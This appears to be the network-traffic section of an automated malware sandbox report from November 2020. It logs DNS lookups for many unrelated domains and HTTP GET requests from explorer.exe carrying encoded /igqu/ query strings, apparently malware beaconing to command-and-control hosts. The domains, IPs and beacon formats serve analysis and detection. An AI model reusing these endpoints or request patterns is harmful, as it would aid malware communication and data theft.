Nov 21, 2020 09:23:05.044382095 CET	53	51352	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:05.992248058 CET	59349	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:06.027966022 CET	53	59349	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:06.788253069 CET	57084	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:06.815381050 CET	53	57084	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:07.597861052 CET	58823	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:07.633567095 CET	53	58823	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:08.636363983 CET	57568	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:08.663465023 CET	53	57568	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:09.419197083 CET	50540	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:09.446274042 CET	53	50540	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:14.053543091 CET	54366	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:14.092390060 CET	53	54366	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:15.523149014 CET	53034	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:15.558841944 CET	53	53034	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:19.394763947 CET	57762	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:19.558604956 CET	53	57762	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:24.852360010 CET	55435	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:24.892208099 CET	53	55435	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:24.973694086 CET	50713	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:24.974024057 CET	56132	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:25.011109114 CET	53	56132	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:25.011164904 CET	53	50713	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:27.058589935 CET	58987	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:27.085989952 CET	53	58987	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:30.053802013 CET	56579	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:30.203284979 CET	53	56579	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:30.857566118 CET	60633	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:30.893316984 CET	53	60633	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:35.519464970 CET	61292	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:35.570893049 CET	53	61292	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:40.629240990 CET	63619	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:40.966485977 CET	53	63619	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:46.414911985 CET	64938	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:46.565484047 CET	53	64938	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:51.808078051 CET	61946	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:51.982304096 CET	53	61946	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:57.386825085 CET	64910	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:57.447319984 CET	53	64910	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:02.145009041 CET	52123	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:02.172174931 CET	53	52123	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:02.619760990 CET	56130	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:02.660164118 CET	53	56130	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:04.151099920 CET	56338	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:04.186832905 CET	53	56338	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:07.887969017 CET	59420	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:08.056883097 CET	53	59420	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:13.227334976 CET	58784	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:13.268898010 CET	53	58784	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:23.669981956 CET	63978	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:23.709835052 CET	53	63978	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:28.852160931 CET	62938	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:29.182164907 CET	53	62938	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:34.865910053 CET	55708	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:34.901865005 CET	53	55708	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 21, 2020 09:23:14.053543091 CET	192.168.2.3	8.8.8.8	0xf435	Standard query (0)	www.ownumo.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:19.394763947 CET	192.168.2.3	8.8.8.8	0x6bec	Standard query (0)	www.trafegopago.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:24.852360010 CET	192.168.2.3	8.8.8.8	0x4af0	Standard query (0)	www.coveloungewineandwhiskey.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:24.974024057 CET	192.168.2.3	8.8.8.8	0x2122	Standard query (0)	cdn.onenote.net	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:30.053802013 CET	192.168.2.3	8.8.8.8	0x748d	Standard query (0)	www.covid19salivatestdirect.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:35.519464970 CET	192.168.2.3	8.8.8.8	0x9411	Standard query (0)	www.heartandcrowncloset.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:40.629240990 CET	192.168.2.3	8.8.8.8	0xb756	Standard query (0)	www.primeworldgroup.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:46.414911985 CET	192.168.2.3	8.8.8.8	0xaded	Standard query (0)	www.placeduconfort.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:51.808078051 CET	192.168.2.3	8.8.8.8	0xfde5	Standard query (0)	www.hyx20140813.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:57.386825085 CET	192.168.2.3	8.8.8.8	0x5efe	Standard query (0)	www.obsessingwealth.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:02.619760990 CET	192.168.2.3	8.8.8.8	0x8c1c	Standard query (0)	www.cashintl.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:07.887969017 CET	192.168.2.3	8.8.8.8	0xf834	Standard query (0)	www.namofast.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.227334976 CET	192.168.2.3	8.8.8.8	0x659b	Standard query (0)	www.plantpowered.energy	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:23.669981956 CET	192.168.2.3	8.8.8.8	0xcf74	Standard query (0)	www.capitalcitybombers.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:28.852160931 CET	192.168.2.3	8.8.8.8	0xfb2c	Standard query (0)	www.chemtradent.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:34.865910053 CET	192.168.2.3	8.8.8.8	0x80a6	Standard query (0)	www.sweetbasilmarketing.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 21, 2020 09:23:14.092390060 CET	8.8.8.8	192.168.2.3	0xf435	No error (0)	www.ownumo.com		74.208.236.115	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:19.558604956 CET	8.8.8.8	192.168.2.3	0x6bec	No error (0)	www.trafegopago.com	trafegopago.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:19.558604956 CET	8.8.8.8	192.168.2.3	0x6bec	No error (0)	trafegopago.com		192.185.213.99	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:24.892208099 CET	8.8.8.8	192.168.2.3	0x4af0	No error (0)	www.coveloungewineandwhiskey.com	coveloungewineandwhiskey.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:24.892208099 CET	8.8.8.8	192.168.2.3	0x4af0	No error (0)	coveloungewineandwhiskey.com		34.102.136.180	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:25.011109114 CET	8.8.8.8	192.168.2.3	0x2122	No error (0)	cdn.onenote.net	cdn.onenote.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:30.203284979 CET	8.8.8.8	192.168.2.3	0x748d	No error (0)	www.covid19salivatestdirect.com		208.91.197.160	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:35.570893049 CET	8.8.8.8	192.168.2.3	0x9411	No error (0)	www.heartandcrowncloset.com	heartandcrowncloset.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:35.570893049 CET	8.8.8.8	192.168.2.3	0x9411	No error (0)	heartandcrowncloset.com		160.153.136.3	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:40.966485977 CET	8.8.8.8	192.168.2.3	0xb756	No error (0)	www.primeworldgroup.com		168.206.180.179	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:46.565484047 CET	8.8.8.8	192.168.2.3	0xaded	No error (0)	www.placeduconfort.com	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:46.565484047 CET	8.8.8.8	192.168.2.3	0xaded	No error (0)	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		3.138.72.189	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:46.565484047 CET	8.8.8.8	192.168.2.3	0xaded	No error (0)	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		3.12.202.18	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:46.565484047 CET	8.8.8.8	192.168.2.3	0xaded	No error (0)	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		3.134.22.63	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:51.982304096 CET	8.8.8.8	192.168.2.3	0xfde5	No error (0)	www.hyx20140813.com	bailedao.leboweb.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:51.982304096 CET	8.8.8.8	192.168.2.3	0xfde5	No error (0)	bailedao.leboweb.com		119.81.172.165	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:57.447319984 CET	8.8.8.8	192.168.2.3	0x5efe	No error (0)	www.obsessingwealth.com	www1.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:57.447319984 CET	8.8.8.8	192.168.2.3	0x5efe	No error (0)	www1.wixdns.net	balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:57.447319984 CET	8.8.8.8	192.168.2.3	0x5efe	No error (0)	balancer.wixdns.net	5f36b111-balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:57.447319984 CET	8.8.8.8	192.168.2.3	0x5efe	No error (0)	5f36b111-balancer.wixdns.net	td-balancer-euw2-6-109.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:57.447319984 CET	8.8.8.8	192.168.2.3	0x5efe	No error (0)	td-balancer-euw2-6-109.wixdns.net		35.246.6.109	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:02.660164118 CET	8.8.8.8	192.168.2.3	0x8c1c	No error (0)	www.cashintl.com		54.208.77.124	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:02.660164118 CET	8.8.8.8	192.168.2.3	0x8c1c	No error (0)	www.cashintl.com		34.206.12.234	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:02.660164118 CET	8.8.8.8	192.168.2.3	0x8c1c	No error (0)	www.cashintl.com		35.169.58.188	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:08.056883097 CET	8.8.8.8	192.168.2.3	0xf834	No error (0)	www.namofast.com		13.248.196.204	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	www.plantpowered.energy	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:23.709835052 CET	8.8.8.8	192.168.2.3	0xcf74	No error (0)	www.capitalcitybombers.com	capitalcitybombers.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:24:23.709835052 CET	8.8.8.8	192.168.2.3	0xcf74	No error (0)	capitalcitybombers.com		34.102.136.180	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:29.182164907 CET	8.8.8.8	192.168.2.3	0xfb2c	No error (0)	www.chemtradent.com		45.194.171.26	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:34.901865005 CET	8.8.8.8	192.168.2.3	0x80a6	No error (0)	www.sweetbasilmarketing.com	sweetbasilmarketing.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:24:34.901865005 CET	8.8.8.8	192.168.2.3	0x80a6	No error (0)	sweetbasilmarketing.com		185.201.11.126	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.ownumo.com

www.trafegopago.com

www.coveloungewineandwhiskey.com

www.covid19salivatestdirect.com

www.heartandcrowncloset.com

www.primeworldgroup.com

www.placeduconfort.com

www.hyx20140813.com

www.obsessingwealth.com

www.cashintl.com

www.namofast.com

www.plantpowered.energy

www.capitalcitybombers.com

www.chemtradent.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49727	74.208.236.115	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:14.234828949 CET	232	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA HTTP/1.1 Host: www.ownumo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:23:14.377899885 CET	233	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1364 Connection: close Date: Sat, 21 Nov 2020 08:23:14 GMT Server: Apache X-Frame-Options: deny Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc
Nov 21, 2020 09:23:14.377935886 CET	234	IN	Data Raw: 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 53 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ation.host + '/' + 'IONOSParkingUS' + '/park.js">' + '<\/script>' ); </script> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49729	192.185.213.99	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:19.695023060 CET	266	OUT	GET /igqu/?JBZ0nHS=donhjXNh7kLY1iCc+SlENWzt8x7IoGbTUq/N2y8xDHDKv1jZWtQO4VPvuCjZtFGhRuQ3&BZ=E2J8Yj-0_Jl HTTP/1.1 Host: www.trafegopago.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:23:19.834455013 CET	267	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 21 Nov 2020 08:23:19 GMT Server: Apache Location: https://www.trafegopago.com/igqu/?JBZ0nHS=donhjXNh7kLY1iCc+SlENWzt8x7IoGbTUq/N2y8xDHDKv1jZWtQO4VPvuCjZtFGhRuQ3&BZ=E2J8Yj-0_Jl Cache-Control: max-age=0 Expires: Sat, 21 Nov 2020 08:23:19 GMT Content-Length: 337 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 66 65 67 6f 70 61 67 6f 2e 63 6f 6d 2f 69 67 71 75 2f 3f 4a 42 5a 30 6e 48 53 3d 64 6f 6e 68 6a 58 4e 68 37 6b 4c 59 31 69 43 63 2b 53 6c 45 4e 57 7a 74 38 78 37 49 6f 47 62 54 55 71 2f 4e 32 79 38 78 44 48 44 4b 76 31 6a 5a 57 74 51 4f 34 56 50 76 75 43 6a 5a 74 46 47 68 52 75 51 33 26 61 6d 70 3b 42 5a 3d 45 32 4a 38 59 6a 2d 30 5f 4a 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.trafegopago.com/igqu/?JBZ0nHS=donhjXNh7kLY1iCc+SlENWzt8x7IoGbTUq/N2y8xDHDKv1jZWtQO4VPvuCjZtFGhRuQ3&BZ=E2J8Yj-0_Jl">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49750	13.248.196.204	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:24:08.075890064 CET	4657	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=hBI3Otxb8cB+II9lzJ/uJul9cug51W/gKrRcuXZMLk1SgBX4+5ai4onE9bbZmy8EPFIt HTTP/1.1 Host: www.namofast.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:24:08.218797922 CET	4658	IN	HTTP/1.1 403 Forbidden Date: Sat, 21 Nov 2020 08:24:08 GMT Content-Type: text/html Content-Length: 146 Connection: close Server: nginx Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49751	198.54.117.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:24:13.440628052 CET	4659	OUT	GET /igqu/?JBZ0nHS=SGVuGExhnGF4yxDyK5xX6Vc4jl6qy7oMTqbPjfmzMsQE0E0I89iRcikd677eURgEdiQj&BZ=E2J8Yj-0_Jl HTTP/1.1 Host: www.plantpowered.energy Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49752	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:24:23.729590893 CET	4660	OUT	GET /igqu/?JBZ0nHS=iX1DJYif3eJ2qCI9y9y3neEoNBEbwEqOJ7CoPPWNank/pdm5KGiwxeIXvmA+SDcpynqB&BZ=E2J8Yj-0_Jl HTTP/1.1 Host: www.capitalcitybombers.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:24:23.844413996 CET	4660	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sat, 21 Nov 2020 08:24:23 GMT Content-Type: text/html Content-Length: 275 ETag: "5fb7c735-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
